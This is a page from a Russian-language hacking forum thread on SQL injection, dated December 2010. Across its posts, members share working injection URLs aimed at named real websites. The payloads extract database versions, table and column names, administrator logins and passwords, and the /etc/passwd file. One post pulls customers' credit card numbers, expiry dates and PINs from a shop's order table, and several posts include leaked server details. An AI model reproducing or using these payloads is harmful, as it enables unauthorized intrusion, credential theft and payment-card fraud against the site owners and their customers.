HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1356 из 1604 « Первая < 356856125613061346 1352 1353 1354 1355 1356 1357 1358 1359 1360 136614061456 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #13551  
Старый 13.12.2010, 01:49
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
familyrapp.com

PR 4

http://www.familyrapp.com/Results/recipe_book_category_results_review.asp?BookID=150 8+or+1=@@version (2000 ветка,поддержки xml raw нету)

http://www.familyrapp.com/Results/recipe_book_category_results_review.asp?BookID=150 8+or+1=(select+top+1+username+from+login+where+use rname+not+in+(select+top+0+username+from+login)) (юзвери)

http://www.familyrapp.com/Results/recipe_book_category_results_review.asp?BookID=150 8+or+1=(select+top+1+password+from+login+where+pas sword+not+in+(select+top+0+password+from+login)) (пароли)
 
Ответить с цитированием

  #13552  
Старый 13.12.2010, 18:51
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
_http://fmv.bz/jp/item.php?i=-24+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),user(),database()),10,11,12--

5.0.51a-log:sd_dba_LTkzODky@cgi07.unix:sddb0025016300
 
Ответить с цитированием

  #13553  
Старый 13.12.2010, 22:36
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
indusites.com

http://indusites.com/press/press-release-details.asp?id=141+or+1=@@version (2005 ветка )

http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+top+1+table_name+f rom+information_schema.tables+where+table_name+not +in+(select+top+9+table_name+from+information_sche ma.tables)) (нужная нам таблица)

http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+top+1+column_name+ from+information_schema.columns+where+table_name=' tblAdmin'+and+column_name+not+in+(select+top+0+col umn_name+from+information_schema.columns+where+tab le_name='tblAdmin'+group+by+column_name)+group+by+ column_name+for+xml+raw) (перебираем колонки)

http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+quotename(username %2B':'%2Buserpassword)+from+tblAdmin) (логин и пароль админа )

http://indusites.com/admin/ (сама админка)
 
Ответить с цитированием

  #13554  
Старый 13.12.2010, 23:17
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
http://ichep04.ihep.ac.cn/db/abs_cont1.php?session_no=3&id=-548+union+select+1,unhex(hex(concat_ws(0x3a,user,p assword))),3,4,5,6,load_file('/etc/passwd'),8,9,0,11,12,13,14,15,16,17,18,19+from+mys ql.user--
 
Ответить с цитированием

  #13555  
Старый 14.12.2010, 07:56
Keltos
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191

Репутация: 2562


По умолчанию
Код HTML:
HTML:
http://www.kimallansilk.com/productdetail.php?proid=-1+union+select+1,2,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),4,5,6,7,8,9,10,11+from+information_schema.tables+limit+0,1--
Код HTML:
HTML:
http://www.forest-products.co.uk/products.php?id=-181+UnIon+selECt+1,2,3,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),5,6,7,8,9,10+from+information_schema.tables+limit+0,1--
 
Ответить с цитированием

  #13556  
Старый 14.12.2010, 15:02
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
http://www.pricon.co.in/newsview.php?newsid=7+and+1=0+union+select+1,2,con cat_ws(0x3a,user,password,host,file_priv),4,5,6,7, 8+from+mysql.user

http://www.pricon.co.in/newsview.php?newsid=7+and+1=0+union+select+1,2,loa d_file(0x2f6574632f706173737764),4,5,6,7,8
 
Ответить с цитированием

  #13557  
Старый 14.12.2010, 19:21
Keltos
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191

Репутация: 2562


По умолчанию
Код HTML:
HTML:
http://www.boredatuni.com/stuff.php?stuffId=-73+union+select+1,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),3+from+information_schema.tables+limit+0,1--
Код HTML:
HTML:
http://www.toonecards.com/view-free-stuff.php?id=-20+UnIon+selECt+1,2,3,4,5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20+--+
Код HTML:
HTML:
http://www.sandwichbau.de/newsview.php?newsid=-118+UnIon+selECt+1,2,3,4,5,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),7,8,9,10,11+from+information_schema.tables+limit+0,1--
Код HTML:
HTML:
http://www.antoniandalison.co.uk/shop.php?category=-4+union+select+1,aes_decrypt(aes_encrypt(group_concat(table_name),1),1)+from+information_schema.tables+limit+0,1--
Код HTML:
HTML:
http://www.griefencounter.org.uk/shop.php?ShopID=-5+union+select+1,version(),3,4--+
Код HTML:
HTML:
http://www.skye.co.uk/local-media-shop.php?catid=-14+union+select+1,2,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),4,5,6+from+information_schema.tables+limit+0,1--
Код HTML:
HTML:
http://www.brokenpencil.com/view.php?id=-5392+UnIon+selECt+1,2,3,4,5,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),7,8,9,10,11,12+from+information_schema.tables+limit+0,1--
Код HTML:
HTML:
http://www.31girl.com/shop.php?pid=-1+union+select+1,2,3,4,concat_ws(0x3a,FirstName,LastName,ShippingAddress,Country,City,State,Zip,Email,Phone,CreditCardType,CreditCardNumber,CreditCardName,CreditCardExpiryDate,CreditCardPinNumber),6,7,8+from+shop_orders--
 
Ответить с цитированием

  #13558  
Старый 14.12.2010, 19:35
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
http://www.alcobex.com/newsview.php?newsid=-11+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9,10-- (вывод в титле)

http://www.sandwichbau.de/newsview.php?newsid=-85+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9,10,11--

http://snow-country.jp/festival/contents.php?id=-10+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4--
 
Ответить с цитированием

  #13559  
Старый 14.12.2010, 22:26
ALIM
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855

Репутация: 0
По умолчанию
http://www.job-passport.com/en/activity_detail.php?actid=-21%20union%20select%201,2,3,4,version(),6,7,8,9,10 ,11,12 --

не нашёл админку

ver:5.0.77

datadir:/var/lib/mysql/

base:jobpass_test

tmpdir:/tmp/

user:jobpass@localhost

os:redhat-linux-gnu

basedir:/usr/
 
Ответить с цитированием

  #13560  
Старый 15.12.2010, 01:52
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию
http://www.povareschka.ru/prod.php?id=4+union+select+1,table_name,3,4,5,6,7, 8+from+information_schema.tables+--&sort=9

tables: administrator, user

---------------------------------------------------

http://www.ucamind.com/prod.php?id=4+union+select+1,group_concat(0x0b,id, 0x3a,username,0x3a,password),3,4,5,6,7,8+from+admi nlogin+--
 
Ответить с цитированием
Ответ
Страница 1356 из 1604 « Первая < 356856125613061346 1352 1353 1354 1355 1356 1357 1358 1359 1360 136614061456 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ